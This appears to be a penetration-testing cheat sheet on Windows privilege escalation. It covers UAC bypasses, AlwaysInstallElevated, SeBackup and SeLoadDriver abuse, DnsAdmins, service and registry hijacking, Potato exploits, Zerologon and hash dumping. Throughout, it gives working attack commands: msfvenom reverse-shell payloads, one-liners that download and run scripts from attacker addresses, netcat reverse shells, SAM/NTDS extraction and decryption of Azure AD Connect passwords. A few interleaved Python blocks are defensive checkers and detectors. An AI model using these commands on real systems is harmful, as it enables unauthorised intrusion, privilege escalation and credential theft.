# Privilege Escalation: Windows 👑

## 01. Common Tricks

### 01.1 UAC Bypass

* **DLL Hijacking UAC Bypass** (SystemPropertiesAdvanced.exe). Click [here](https://github.com/hfiref0x/UACME) for more!

```bash
## Source : https://egre55.github.io/system-properties-uac-bypass/
## ------------------| Check if we are vulnerable
IWR http://10.10.14.38/sigcheck64.exe -outfile sigcheck.exe
.\sigcheck.exe -accepteula -m C:\Windows\SysWOW64\SystemPropertiesAdvanced.exe | findstr autoElevate
## If autoElevate is true, we are good to go!!

## ------------------| Create backdoor dll file
https://docs.h4rithd.com/tools/shells-payloads#09.-dll-hijack

## ------------------| Exploit
copy srrstr.dll C:\Users\<USER>\appdata\local\microsoft\windowsapps\srrstr.dll
cmd /c C:\Windows\SysWow64\SystemPropertiesAdvanced.exe
### If you get an error saying "This operation requires an interactive window",
### you need an interactive session: use a C2 (e.g. GreatSCT/MSBuild to launch Meterpreter)

## ------------------| Use with interactive shell
### Create payload and gain shell using the following method
### https://docs.h4rithd.com/tools/shells-payloads#10.-greatsct
### migrate the process to explorer.exe
meterpreter > ps -S explorer
meterpreter > migrate <PID>
meterpreter > shell
cmd /c C:\Windows\SysWow64\SystemPropertiesAdvanced.exe
```

### 01.2 If you have, are in, or can?

* `AlwaysInstallElevated` check
  * [Check this article for more details.](https://www.hackingarticles.in/windows-privilege-escalation-alwaysinstallelevated/)

```bash
## ------------------| How to check
reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

## If both queries show a value named "AlwaysInstallElevated"
## of type REG_DWORD with data 0x1, the AlwaysInstallElevated policy
## is enabled (it only takes effect when set in BOTH hives):
## any user can install an .msi with elevated (SYSTEM) privileges.

## ------------------| Exploit
## Create msfvenom payload
msfvenom -p windows/meterpreter/reverse_tcp lhost=<IP> lport=<PORT> -f msi > pw3n.msi
## or
msfvenom -p windows/x64/exec CMD="cmd /c powershell iex(new-object net.webclient).downloadstring('http://10.14.14.7/shell.ps1')" -f msi > pw3n.msi

## Execute the MSI package on the Windows command prompt
msiexec /quiet /qn /i pw3n.msi
## /quiet = Suppress any messages to the user during installation
## /qn = No GUI
## /i = Regular (vs. administrative) installation
```
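As an added, defender-side example (not from the page): the two `reg query` results above can be evaluated offline. This Python applies the actual enablement rule, that the value must be REG_DWORD 1 under both HKCU and HKLM, and treats a missing key or 0x0 in either hive as not enabled. The sample outputs are constructed.

```python
import re

# Added example (not from the original page): parses `reg query` output for the
# two Installer policy keys offline and applies the real enablement rule
# (the value must be REG_DWORD 1 under BOTH HKCU and HKLM).

VALUE_LINE = re.compile(r"^\s+(\S+)\s+(REG_[A-Z_]+)\s+(.*?)\s*$")


def parse_reg_query(text):
    """Parse `reg query` output into {value_name: (type, data)}.
    Key-path lines and error text ("ERROR: The system was unable to find ...")
    produce no entries, so a missing key parses to {}."""
    values = {}
    for line in text.splitlines():
        m = VALUE_LINE.match(line)
        if m:
            values[m.group(1)] = (m.group(2), m.group(3))
    return values


def dword_is_one(values, name="AlwaysInstallElevated"):
    """True only if `name` exists as REG_DWORD and its hex-printed data is 1."""
    typ, data = values.get(name, (None, None))
    return typ == "REG_DWORD" and data is not None and int(data, 16) == 1


def always_install_elevated(hkcu_output, hklm_output):
    """The policy only takes effect when set to 1 in both hives;
    one hive alone is not a finding."""
    return (dword_is_one(parse_reg_query(hkcu_output))
            and dword_is_one(parse_reg_query(hklm_output)))


# Constructed outputs in `reg query` format (not captured from a real host).
HKCU_ENABLED = r"""
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
"""
HKLM_ENABLED = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
"""
HKLM_DISABLED = HKLM_ENABLED.replace("0x1", "0x0")
HKLM_MISSING = "ERROR: The system was unable to find the specified registry key or value."

if __name__ == "__main__":
    print("both 0x1    :", always_install_elevated(HKCU_ENABLED, HKLM_ENABLED))
    print("HKLM 0x0    :", always_install_elevated(HKCU_ENABLED, HKLM_DISABLED))
    print("HKLM missing:", always_install_elevated(HKCU_ENABLED, HKLM_MISSING))
```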

* Do you have `SeBackupPrivilege` and `SeRestorePrivilege`?

```bash
## ------------------| Check whether they are enabled
whoami /all | findstr "SeBackupPrivilege SeRestorePrivilege"

## ------------------| Copy the SYSTEM and SAM hives to the current directory
reg save HKLM\SYSTEM SYSTEM
reg save HKLM\SAM SAM

## Then we also need to copy the Active Directory database, ntds.dit

## ------------------| Create the diskshadow script (script.txt) on the local machine
set verbose on
set metadata C:\Windows\Temp\meta.cab
set context clientaccessible
set context persistent
begin backup
add volume C: alias cdrive
create
expose %cdrive% E:
end backup

## ------------------| Convert the script to Windows line endings and upload it
unix2dos script.txt

## ------------------| Use diskshadow to snapshot the C: drive
diskshadow.exe /s script.txt
## The entire file system can now be accessed via the E: drive
ls E:

## ------------------| Use robocopy (backup mode) to copy E:\Windows\ntds\ntds.dit
robocopy /B E:\Windows\ntds\ .\ ntds.dit
## Then download the SAM, SYSTEM and ntds.dit files and use secretsdump.py to get the administrator hashes

## ------------------| Using wbadmin.exe
## wbadmin needs an SMB backup target whose share is formatted as NTFS/ReFS.
## On a Samba host, create and mount an NTFS image for the share like so:
dd if=/dev/zero of=ntfs.disk bs=320M count=2
losetup -fP ntfs.disk
losetup -a
mkfs.ntfs /dev/loop0
mount /dev/loop0 ./

echo y | wbadmin start backup -backuptarget:\\10.10.14.22\share\ -include:c:\windows\ntds\ntds.dit
```

* If you have `SeLoadDriverPrivilege`?

```bash
## ------------------| Download the following files and upload them to the machine
wget https://github.com/FuzzySecurity/Capcom-Rootkit/raw/master/Driver/Capcom.sys
wget https://raw.githubusercontent.com/h4rithd/Precompiled-Binaries/main/Capcom/EoPLoadDriver.exe
wget https://raw.githubusercontent.com/h4rithd/Precompiled-Binaries/main/Capcom/ExploitCapcom.exe

## ------------------| Create payload and upload
msfvenom --platform windows -a x64 -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > h4rithd.exe

## ------------------| Exploit
copy h4rithd.exe C:\Windows\Temp\h4rithd.exe # This path is required; then start your listener
.\ExploitCapcom.exe
```

* If the user is in the `DnsAdmins` group?

```bash
## ------------------| Create payload
msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f dll > h4rithd.dll

## ------------------| Create SMB share on local machine
impacket-smbserver share ./

## ------------------| Do this on the owned remote box
dnscmd.exe 127.0.0.1 /config /serverlevelplugindll \\<IP>\<Path-To-Dll-File>
sc.exe stop dns
## Start a netcat listener, then
sc.exe start dns
```

* If you have `GenericAll` on user jorden

```bash
## ------------------| Disable Kerberos pre-authentication for user jorden (makes the account AS-REP roastable)
Get-ADUser jorden | Set-ADAccountControl -DoesNotRequirePreAuth $true

## ------------------| Then request the AS-REP hash
impacket-GetNPUsers htb.local/jorden -dc-ip 192.168.3.203 -no-pass
```

* If you have `GenericWrite` on any service

```bash
## ------------------| Check that we can talk to the service controller
sc.exe

## ------------------| If that succeeds, exploit [the space after binpath= is required]
sc.exe config UsoSVC binpath= "\"c:\windows\system32\cmd.exe /c powershell C:\\Windows\\system32\\spool\\drivers\\color\\rev.ps1\""
sc.exe stop UsoSVC
sc.exe config UsoSVC start= auto
sc.exe start UsoSVC
```

* If you can execute `xp_dirtree`?

```bash
## Turn on Responder
sudo responder -i tun0

## Execute (the SQL Server service account authenticates to our share)
sqlcmd -Q "EXEC xp_dirtree '\\YourIP\test'"

## Responder captures the Net-NTLMv2 hash; crack it with
hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt
```

* If you are in the `Azure Admins` group?

```bash
## Read this blog
https://blog.xpnsec.com/azuread-connect-for-redteam/

## Methodology
$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Server=localhost;Integrated Security=true;Initial Catalog=ADSync"
$client.Open()
$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT keyset_id, instance_id, entropy FROM mms_server_configuration"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$key_id = $reader.GetInt32(0)
$instance_id = $reader.GetGuid(1)
$entropy = $reader.GetGuid(2)
$reader.Close()

$cmd = $client.CreateCommand()
$cmd.CommandText = "SELECT private_configuration_xml, encrypted_configuration FROM mms_management_agent WHERE ma_type = 'AD'"
$reader = $cmd.ExecuteReader()
$reader.Read() | Out-Null
$config = $reader.GetString(0)
$crypted = $reader.GetString(1)
$reader.Close()

add-type -path 'C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll'
$km = New-Object -TypeName Microsoft.DirectoryServices.MetadirectoryServices.Cryptography.KeyManager
$km.LoadKeySet($entropy, $instance_id, $key_id)
$key = $null
$km.GetActiveCredentialKey([ref]$key)
$key2 = $null
$km.GetKey(1, [ref]$key2)
$decrypted = $null
$key2.DecryptBase64ToString($crypted, [ref]$decrypted)

$domain = select-xml -Content $config -XPath "//parameter[@name='forest-login-domain']" | select @{Name = 'Domain'; Expression = {$_.node.InnerXML}}
$username = select-xml -Content $config -XPath "//parameter[@name='forest-login-user']" | select @{Name = 'Username'; Expression = {$_.node.InnerXML}}
$password = select-xml -Content $decrypted -XPath "//attribute" | select @{Name = 'Password'; Expression = {$_.node.InnerText}}

Write-Host ("Domain: " + $domain.Domain)
Write-Host ("Username: " + $username.Username)
Write-Host ("Password: " + $password.Password)
```

* If you are a member of the `Event Log Readers` group.

```bash
wget https://raw.githubusercontent.com/RamblingCookieMonster/PowerShell/master/Get-WinEventData.ps1
IEX(New-Object Net.WebClient).downloadString('http://10.10.14.25/Get-WinEventData.ps1')

# Simple example showing the computer an event was generated on, the time, and any custom event data
Get-WinEvent -LogName system -max 1 | Get-WinEventData | Select -Property MachineName, TimeCreated, e_*

# Find lockout events (4740) on a domain controller
Get-WinEvent -ComputerName DomainController1 -FilterHashtable @{Logname='security';id=4740} -MaxEvents 10 | Get-WinEventData | Select TimeCreated, e_TargetUserName, e_TargetDomainName

# Process creation events (4688, "A new process has been created") with their command lines
Get-WinEvent -FilterHashtable @{Logname='security';id=4688} | Get-WinEventData | Select TimeCreated,MachineName,e_CommandLine | ft -autosize -wrap

## Check this out for Windows event IDs
https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/default.aspx
```
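An added example (not part of the original page): once the 4688 command lines above are exported, they can be screened for the techniques this page describes. The rules and sample events are constructed; field names mirror the TimeCreated / MachineName / e_CommandLine columns Get-WinEventData returns.

```python
import re
from collections import Counter

# Added example (not from the original page): detection rules for the command
# lines this page's techniques leave in 4688 ("A new process has been created")
# events, run over constructed sample records.

RULES = [
    ("service_binpath_changed",
     re.compile(r"\bsc(?:\.exe)?\s+config\b.*\bbinpath=", re.I)),
    ("silent_msi_install",
     re.compile(r"\bmsiexec(?:\.exe)?\b.*(?:/quiet|/qn)\b", re.I)),
    ("registry_hive_dump",
     re.compile(r"\breg(?:\.exe)?\s+save\s+HKLM\\(?:SAM|SYSTEM|SECURITY)\b", re.I)),
    ("diskshadow_script",
     re.compile(r"\bdiskshadow(?:\.exe)?\s+/s\b", re.I)),
    ("fodhelper_ms_settings",
     re.compile(r"HKCU:?\\Software\\Classes\\ms-settings", re.I)),
    ("dns_serverlevelplugindll",
     re.compile(r"\bdnscmd(?:\.exe)?\b.*/serverlevelplugindll\b", re.I)),
    ("wbadmin_ntds_backup",
     re.compile(r"\bwbadmin(?:\.exe)?\s+start\s+backup\b.*ntds\.dit", re.I)),
]


def classify(event):
    """Return the names of every rule matching the event's command line."""
    cmd = event.get("CommandLine") or ""
    return [name for name, pat in RULES if pat.search(cmd)]


def detect(events):
    """Run all events through the rules. Returns (hits, per_rule_counts) where
    hits is a list of (rule_name, event) and per_rule_counts is a Counter."""
    hits = [(rule, ev) for ev in events for rule in classify(ev)]
    return hits, Counter(rule for rule, _ in hits)


# Constructed sample events (not captured from a real host). The first seven
# reproduce commands shown on this page; the last two are benign.
SAMPLE_EVENTS = [
    {"TimeCreated": "2024-01-10 09:12:01", "MachineName": "WS01",
     "CommandLine": r'sc config UsoSVC binpath= "C:\Windows\Temp\rev.exe"'},
    {"TimeCreated": "2024-01-10 09:13:40", "MachineName": "WS01",
     "CommandLine": "msiexec /quiet /qn /i pw3n.msi"},
    {"TimeCreated": "2024-01-10 09:15:07", "MachineName": "DC01",
     "CommandLine": r"reg save HKLM\SAM SAM"},
    {"TimeCreated": "2024-01-10 09:15:09", "MachineName": "DC01",
     "CommandLine": "diskshadow.exe /s script.txt"},
    {"TimeCreated": "2024-01-10 09:20:33", "MachineName": "WS02",
     "CommandLine": r"REG ADD HKCU\Software\Classes\ms-settings\shell\open\command /v DelegateExecute /t REG_SZ"},
    {"TimeCreated": "2024-01-10 09:22:18", "MachineName": "DC01",
     "CommandLine": r"dnscmd.exe 127.0.0.1 /config /serverlevelplugindll \\192.0.2.10\share\plugin.dll"},
    {"TimeCreated": "2024-01-10 09:25:00", "MachineName": "DC01",
     "CommandLine": r"wbadmin start backup -backuptarget:\\192.0.2.10\share\ -include:c:\windows\ntds\ntds.dit"},
    {"TimeCreated": "2024-01-10 09:30:12", "MachineName": "WS01",
     "CommandLine": r"notepad.exe C:\Users\alice\notes.txt"},
    {"TimeCreated": "2024-01-10 09:31:45", "MachineName": "WS01",
     "CommandLine": "msiexec /i setup.msi"},
]

if __name__ == "__main__":
    hits, counts = detect(SAMPLE_EVENTS)
    for rule, ev in hits:
        print(f"{ev['TimeCreated']}  {ev['MachineName']:<5} {rule:<26} {ev['CommandLine']}")
    print(dict(counts))
```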

* If you are in the `WSUS Administrators` group? [SharpWSUS](https://github.com/nettitude/SharpWSUS)

```bash
wget https://github.com/h4rithd/PrecompiledBinaries/raw/main/SharpWSUS/SharpWSUS.exe
wget https://github.com/h4rithd/PrecompiledBinaries/raw/main/PsExec64/PsExec64.exe -O psexec.exe

.\SharpWSUS.exe create /payload:"C:\Users\sflowers\Documents\psexec.exe" /args:"-accepteula -s -d C:\\Users\\sflowers\\Documents\\nc.exe -e cmd 10.10.14.4 4545" /title:"LocalUpdate"
.\SharpWSUS.exe approve /updateid:<ID> /computername:<HOSTNAME.DOMAIN> /groupname:"LocalUpdate"
### Wait 5-6 minutes for the client to check in
.\SharpWSUS.exe check /updateid:<ID> /computername:<HOSTNAME.DOMAIN>
```

* If you are a member of the `Administrators` group but still stuck?

```bash
## List Administrators group members
net localgroup Administrators

## Use this simple method to bypass UAC (map the administrative share)
net use h: \\127.0.0.1\c$
h:
dir
```

* If you are in the `LAPS_Readers` group

```bash
Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime

$Computers = Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$Computers | Sort-Object ms-Mcs-AdmPwdExpirationTime | Format-Table -AutoSize Name, DnsHostName, ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
$Computers | Export-Csv -Path c:\windows\temp\laps.csv -NoTypeInformation
```

* Hijacking/Migrating login sessions.

```bash
## ------------------| Check who is logged into the machine and which sessions exist
tasklist /v

## ------------------| Get into a session
## Create payload
msfvenom --platform windows -a x64 -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > h4rithd.exe
sudo msfdb run
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST tun0
set LPORT <PORT>
run
meterpreter > ps
## Look for explorer.exe (it is more stable), then copy its PID
migrate <PID>
```

### 01.3 Service / Registry Exploits

* [Insecure Service Permissions](https://sohvaxus.github.io/content/winxp-sp1-privesc.html)

```bash
## ------------------| Enumeration [must have SERVICE_START & SERVICE_STOP permissions]
.\winPEASany.exe quiet servicesinfo
Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'} | findstr "Program"

## ------------------| Check permissions
icacls "C:\Program Files\...\<PATH>\..\pro.exe"
### Look for BUILTIN\Users:(I)(F) (full control for all users)

## ------------------| Check for a particular service name
.\accesschk.exe /accepteula -uwcqv "Authenticated Users" *
.\accesschk.exe /accepteula -uwcqv user <service_name>
accesschk.exe /accepteula -ucqv <ServiceName>

## ------------------| Exploit
## Check current status
sc qc <service_name>
sc query <service_name>
## Set binary path
sc config <service_name> binpath= "\"C:\Windows\Temp\shell.exe\""
## Start service
net start <service_name>
sc STOP <service_name>
sc START <service_name>
## Set automatic start
sc config <service_name> start= auto
## Remove dependencies
sc config <service_name> depend= ""

## ------------------| Restart service
cmd
wmic service where caption="<ServiceName>" get name, caption, state, startmode
## if StartMode is Auto,
## check whether we have the privilege to restart the machine
whoami /priv
```

* Insecure Service Executables

```bash
## ------------------| Check
### RW Everyone
.\accesschk.exe /accepteula -quvw "C:\<PATH>.exe"
### SERVICE_START & SERVICE_STOP permissions
.\accesschk.exe /accepteula -uwcqv user <service_name>

## ------------------| Exploit
## Back up the original executable, then replace it with shell.exe
## Start the service
net start <service_name>
sc STOP <service_name>
sc START <service_name>
```

* [Unquoted Service Path](https://pentestlab.blog/2017/03/09/unquoted-service-path/)

```bash
## ------------------| Intro
C:\Program Files\One Folder\Two Folder\Executable.exe
C:\Program.exe
C:\Program Files\One.exe
C:\Program Files\One Folder\Two.exe
C:\Program Files\A Subfolder\Two Folder\Executable.exe

## ------------------| Check for unquoted paths
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

## ------------------| Check if we have
### SERVICE_START & SERVICE_STOP permissions
.\accesschk.exe /accepteula -uwcqv user <service_name>
### Write permission on the directory [RW BUILTIN\Users]
.\accesschk.exe /accepteula -uwdq <path>

## ------------------| Replace & start service
move payload.exe "C:\Program Files\...\<SUB DIR>\<SUB>.exe"
net start <service_name>
sc STOP <service_name>
sc START <service_name>
```
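An added example (not from the page or any tool it links): given the rows `wmic service get name,pathname,startmode` returns, this Python reproduces the probing order the Intro illustrates, applies the page's filter (auto-start, outside C:\Windows, unquoted) and emits the `sc config ... binpath=` command that re-quotes the path, which is the fix. The service rows are constructed; splitting the image from its arguments at the first `.exe` token is a simplification of CreateProcess parsing.

```python
# Added example (not from the original page): audits service PathName values
# offline and reproduces the lookup order Windows uses for an unquoted path.

def split_image_and_args(pathname):
    """Split an unquoted PathName into (image path, arguments).

    Assumption (a simplification of CreateProcess parsing): the image ends at the
    first token that ends in .exe; anything after it is treated as arguments.
    """
    tokens = pathname.split()
    for i, tok in enumerate(tokens):
        if tok.lower().endswith(".exe"):
            return " ".join(tokens[: i + 1]), " ".join(tokens[i + 1:])
    return pathname, ""


def unquoted_candidates(pathname):
    """Return the files Windows tries BEFORE the intended image for an unquoted
    path containing spaces: every space-delimited prefix with ".exe" appended.
    Quoted paths and paths without spaces yield no candidates."""
    if pathname.startswith('"') or " " not in pathname:
        return []
    image, _args = split_image_and_args(pathname)
    tokens = image.split(" ")
    return [" ".join(tokens[:i]) + ".exe" for i in range(1, len(tokens))]


def audit_services(rows):
    """Apply the page's filter (auto-start, outside C:\\Windows, unquoted) and
    return one finding per affected service with its hijackable candidates."""
    findings = []
    for row in rows:
        path = row["PathName"]
        if row["StartMode"].lower() != "auto":
            continue
        if path.lower().startswith("c:\\windows\\"):  # mirrors findstr /v "c:\windows\\"
            continue
        candidates = unquoted_candidates(path)
        if candidates:
            findings.append({"Name": row["Name"], "PathName": path,
                             "Candidates": candidates})
    return findings


def remediation_command(name, pathname):
    """Build the sc.exe command that re-quotes the image path (the actual fix),
    in the escaped-quote form the page uses for binpath=."""
    image, args = split_image_and_args(pathname)
    quoted = f'\\"{image}\\"' + (f" {args}" if args else "")
    return f'sc config {name} binpath= "{quoted}"'


# Constructed sample rows (not captured from a real host).
SAMPLE_SERVICES = [
    {"Name": "VulnSvc", "StartMode": "Auto",
     "PathName": r"C:\Program Files\One Folder\Two Folder\Executable.exe"},
    {"Name": "Spooler", "StartMode": "Auto",
     "PathName": r"C:\Windows\System32\spoolsv.exe"},
    {"Name": "QuotedSvc", "StartMode": "Auto",
     "PathName": r'"C:\Program Files\Vendor App\svc.exe" -run'},
    {"Name": "ManualSvc", "StartMode": "Manual",
     "PathName": r"C:\Program Files\Other App\tool.exe"},
    {"Name": "ArgsSvc", "StartMode": "Auto",
     "PathName": r"C:\Program Files\Some Vendor\agent.exe -k svc"},
]

if __name__ == "__main__":
    for f in audit_services(SAMPLE_SERVICES):
        print(f"[!] {f['Name']}: {f['PathName']}")
        for c in f["Candidates"]:
            print(f"    would be tried first: {c}")
        print(f"    fix: {remediation_command(f['Name'], f['PathName'])}")
```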

* Weak Registry Permissions

```bash
## ------------------| Verify [check for RW NT AUTHORITY\INTERACTIVE]
Get-Acl HKLM:\<ServicePath>\<ServiceName> | Format-List
.\accesschk.exe /accepteula -uvwqk HKLM\<ServicePath>\<ServiceName>

## ------------------| Check if we can start the service
.\accesschk.exe /accepteula -ucqv user <ServiceName>

## ------------------| Check current values [ImagePath & ObjectName == LocalSystem]
reg query HKLM\<ServicePath>\<ServiceName>

## ------------------| Overwrite ImagePath
reg add HKLM\<ServicePath>\<ServiceName> /v ImagePath /t REG_EXPAND_SZ /d C:\Windows\Temp\shell.exe /f
net start <service_name>
```

## 02. Tools

### 02.1 [PowerUp](https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1)

```bash
## ------------------| Download and execute
C:\windows\sysnative\WindowsPowerShell\v1.0\powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.26/PowerUp.ps1')" 

## ------------------| Most useful checks
Invoke-AllChecks
CurrentUserTokenGroupSid 
Get-RegistryAutoLogon

## ------------------| Check other functions
cat PowerUp.ps1 | grep -Ei '^function' | grep '{$' | grep '-' | awk '{print $2}'
```

### [02.2 PowerUpSQL](https://github.com/NetSPI/PowerUpSQL)

* [Click here for cheatsheet!!](https://github.com/NetSPI/PowerUpSQL/wiki/PowerUpSQL-Cheat-Sheet)

```bash
# Download 
wget https://raw.githubusercontent.com/NetSPI/PowerUpSQL/master/PowerUpSQL.ps1

# Upload 
IEX(New-Object Net.WebClient).downloadString('http://10.10.14.26/PowerUpSQL.ps1')

# Execute commands
Get-SQLInstanceLocal -Verbose
Invoke-SQLUncPathInjection -Verbose
Invoke-SQLImpersonateService -Verbose
Invoke-SQLEscalatePriv -Verbose
$Targets | Invoke-SQLOSCLR -Verbose -Command "Whoami"
$Targets | Invoke-SQLOSPython -Verbose -Command "Whoami"
$Targets | Invoke-SQLOSCmdAgentJob -Verbose -SubSystem CmdExec -Command "echo hello > c:\windows\temp\test1.txt"
$Targets | Invoke-SQLOSCmdAgentJob -Verbose -SubSystem PowerShell -Command 'write-output "hello world" | out-file c:\windows\temp\test2.txt' -Sleep 20     
```

### 02.3 Seatbelt

```bash
# Run ALL enumeration checks
Seatbelt.exe -group=all
```

### 02.4 SecretsDump

```bash
## ------------------| If you have SAM and SYSTEM files on your hand
impacket-secretsdump -sam SAM -system SYSTEM local

## ------------------| Remote
impacket-secretsdump htb.local/h4rithd:'Passw0rD$'@10.10.10.161

# 31d6cfe0d16ae931b73c59d7e0c089c0 <-- blank
# aad3b435b51404eeaad3b435b51404ee <-- blank [LM]

## ------------------| Remote NTDS
## Copy ntds file
robocopy /B C:\Windows\ntds .\ntds ntds.dit
## Copy sam and system file then run
impacket-secretsdump -sam SAMFILE -system SYSTEMFILE -ntds NTDS.DIT local

## ------------------| Local NTDS
impacket-secretsdump -system ntds.bin -ntds ntds.dit local
## ntds.bin: MS Windows registry file, NT/2000 or above
## ntds.dit: Extensible storage engine DataBase, version 0x620, checksum 0x16d44752, page size 8192, DirtyShutdown, Windows version 6.1
```

## 03. Common Exploits

### 03.0 [JuicyPotatoNG](https://github.com/antonioCoco/JuicyPotatoNG) (New)

```bash
## ------------------| Verify the vulnerability
whoami /priv | findstr "Enabled"
# If "SeImpersonatePrivilege" or "SeAssignPrimaryTokenPrivilege" is Enabled, we are good!! 👌👌👌

## ------------------| Download to local machine
wget https://github.com/antonioCoco/JuicyPotatoNG/releases/download/v1.1/JuicyPotatoNG.zip
unzip JuicyPotatoNG.zip

## ------------------| After uploading it to the victim machine, create the .bat file
echo powershell -EncodedCommand SQBFAFgAKABOA.....ApAA== > C:\programdata\shell.bat
type C:\programdata\shell.bat

## ------------------| Run
.\JuicyPotatoNG.exe -t * -p <fullPath>\shell.bat
```

### 03.1 [Juicy Potato](https://github.com/ohpe/juicy-potato) (Abusing the golden privileges)

```bash
## ------------------| Verify the vulnerability
whoami /priv | findstr "Enabled"
# If "SeImpersonatePrivilege" or "SeAssignPrimaryTokenPrivilege" is Enabled, we are good!! 👌👌👌

## ------------------| Create .bat script
## Shell through Netcat
echo START C:\<path>\nc.exe -e powershell.exe YourIP YourPort > sh3ll.bat
## Shell through PowerShell (use this as the .bat content instead)
cmd.exe /c powershell -ep bypass IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.26/rev.ps1')

## ------------------| List CLSID's
.\JuicyPotato.exe -z -l 100

## ------------------| Execute 
.\JuicyPotato.exe -t * -c "{F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}" -p C:\Users\Public\shell.bat -l 1337  
.\JuicyPotato.exe -t * -c "{F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}" -p C:\Users\Public\shell.exe -l 1337  

## ------------------| General options
# Mandatory args:
-t createprocess call: <t> CreateProcessWithTokenW, <u> CreateProcessAsUser, <*> try both  
-p <program>: program to launch
-l <port>: COM server listen port

# Optional args:
-m <ip>: COM server listen address (default 127.0.0.1)
-a <argument>: command line argument to pass to program (default NULL)
-k <ip>: RPC server ip address (default 127.0.0.1)
-n <port>: RPC server listen port (default 135)
-c <{clsid}>: CLSID (default BITS:{4991d34b-80a1-4291-83b6-3328366b9097})
-z only test CLSID and print token's user
```

* Click [here](https://github.com/ohpe/juicy-potato/blob/master/CLSID/README.md) to view CLSIDs

### 03.2 [RoguePotato](https://github.com/antonioCoco/RoguePotato) ([No more JuicyPotato? Old story, welcome RoguePotato!](https://decoder.cloud/2020/05/11/no-more-juicypotato-old-story-welcome-roguepotato/))

```bash
## ------------------| Run chisel to reverse-forward port 9999
chisel server --reverse --port 1337 ## On our machine
.\chisel64.exe client <MyIP>:1337 R:9999:localhost:9999 ## On the target

## ------------------| Run socat to catch 135 and forward it to 9999
sudo socat tcp-listen:135,reuseaddr,fork tcp:127.0.0.1:9999 ## On our machine

## ------------------| Execute RoguePotato
.\RoguePotato.exe -r <MyIP> -e "powershell C:\Windows\Temp\rev.ps1" -l 9999
# or
.\RoguePotato.exe -r <MyIP> -e "c:\windows\temp\h4rithd.exe" -l 9999
```

### 03.3 [MultiPotato](https://github.com/S3cur3Th1sSh1t/MultiPotato)

```bash
## ------------------| Download
### 64-bit
wget https://github.com/h4rithd/PrecompiledBinaries/raw/main/MultiPotato/Multipotatox64.exe -O Multipotato.exe 
### 32-bit
wget https://github.com/h4rithd/PrecompiledBinaries/raw/main/MultiPotato/Multipotatox32.exe -O Multipotato.exe     

## ------------------| BindShell with SpoolSample PipeName
.\MultiPotato.exe -t BindShell -p "pwned\pipe\spoolss"

## ------------------| CreateUser with modified PetitPotam trigger
.\Multipotato.exe -t CreateUser

## ------------------| CreateProcessAsUserW with SpoolSample trigger
.\Multipotato.exe -t CreateProcessAsUserW -p "pwned\pipe\spoolss" -e "C:\temp\stage2.exe"
```

### 03.4 PrintSpoofer

```bash
# !!! The Microsoft Visual C++ Redistributable must be installed

.\PrintSpoofer.exe -i -c "C:\\<PATH>\shell.exe"
```

### 03.5 [Zerologon | CVE 2020-1472](https://github.com/dirkjanm/CVE-2020-1472)

```bash
git clone https://github.com/dirkjanm/CVE-2020-1472.git
cd CVE-2020-1472
python3 cve-2020-1472-exploit.py MULTIMASTER 10.10.10.179

# if the exploit completes,
impacket-secretsdump -just-dc -no-pass MULTIMASTER\$@10.10.10.179

# Now you can login with this 
# '$' is used for machine account
impacket-psexec Administrator@10.10.10.179 -hashes 69cbf4a9b7415c9e1caf93d51d971be0:69cbf4a9b7415c9e1caf93d51d971be0  
```

### 03.6 [Fodhelper.exe - UAC Bypass](https://pentestlab.blog/2017/06/07/uac-bypass-fodhelper/)

```bash
## ------------------| CMD
REG ADD HKCU\Software\Classes\ms-settings\shell\open\command
REG ADD HKCU\Software\Classes\ms-settings\shell\open\command /v DelegateExecute /t REG_SZ         
REG ADD HKCU\Software\Classes\ms-settings\shell\open\command /d "cmd.exe /c powershell -EncodedCommand SQBF..dgZFS==" /f                 
C:\Windows\System32\fodhelper.exe

## ------------------| Powershell
$program = "cmd.exe /c powershell -EncodedCommand SQBF..dgZFS=="
New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value $program -Force
Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden

## ------------------| Remove
Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force
```

### 03.7 Serviio Insecure File Permissions

```bash
## ------------------| Enumeration
Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'} | findstr Serviio
icacls "C:\Program Files\Serviio\bin\ServiioService.exe" # Check if we have BUILTIN\Users:(I)(F)

## ------------------| Exploit
move "C:\Program Files\Serviio\bin\ServiioService.exe" "C:\Program Files\Serviio\bin\ServiioService_original.exe"
move revshell.exe "C:\Program Files\Serviio\bin\ServiioService.exe"
net stop Serviio
